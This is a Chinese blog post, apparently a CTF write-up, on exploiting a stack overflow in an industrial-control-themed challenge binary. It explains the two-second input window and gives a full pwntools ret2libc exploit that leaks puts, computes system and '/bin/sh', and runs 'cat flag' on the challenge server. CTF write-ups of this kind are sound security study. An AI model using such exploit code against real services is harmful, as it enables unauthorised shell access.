Loading... <!-- wp:paragraph --> <p>这道题目挺有点意思,也让我知道了工控安全在ctf是怎么体现的。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>其实很简单</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":882,"sizeSlug":"large","linkDestination":"none"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/12/QQ截图20201230161011.png" alt="" class="wp-image-882"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>就是这样的一个栈溢出而已,几乎没有保护,我们可以为所欲为。但是需要特殊处理,程序一直在跑流水灯</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":883,"sizeSlug":"large","linkDestination":"none"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/12/QQ截图20201230161139.png" alt="" class="wp-image-883"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>当i==2,k==2的时候会退出,设置了一个信号,有两秒钟的短暂输入时间,我们在这个时候输入rop链就可以get shell了。不过整个过程只有两秒钟,很快就会重新被流水灯刷屏,所以不得不通过脚本直接帮我们cat flag。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>输入的时机很好判断,可以输入前会puts一个换行,也就是说会直接接受到两个换行,这个时候输入就可以了。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>exp:</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>#!/usr/bin/env python # coding=utf-8 from pwn import * #context(log_level = 'debug') sh = remote("220.249.52.134","40989") #sh = process("./format") elf = ELF("./format") libc = ELF("./libc_32.so.6") payload = 'a' * 0x88 + 'b' * 4 payload += p32(elf.plt["puts"]) payload += p32(0x8048888) #ret2gee payload += p32(elf.got["puts"]) sh.recvuntil('\n\n') sh.sendline(payload) puts_addr = u32(sh.recv(4)) system_addr = puts_addr - libc.symbols["puts"] + libc.symbols["system"] bin_sh = puts_addr - libc.symbols["puts"] + libc.search('/bin/sh').next() payload = 'a' * 0x88 + 'b' * 4 + p32(system_addr) + 'ret2' + p32(bin_sh) sh.sendline(payload) sh.sendline("cat flag") print sh.recvuntil('}\n') sh.interactive() </code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>不知道为什么,最后的recvuntil必须接收的是'}\n',接受'}'是不行的</p> <!-- /wp:paragraph --> 最后修改:2020 年 12 月 30 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧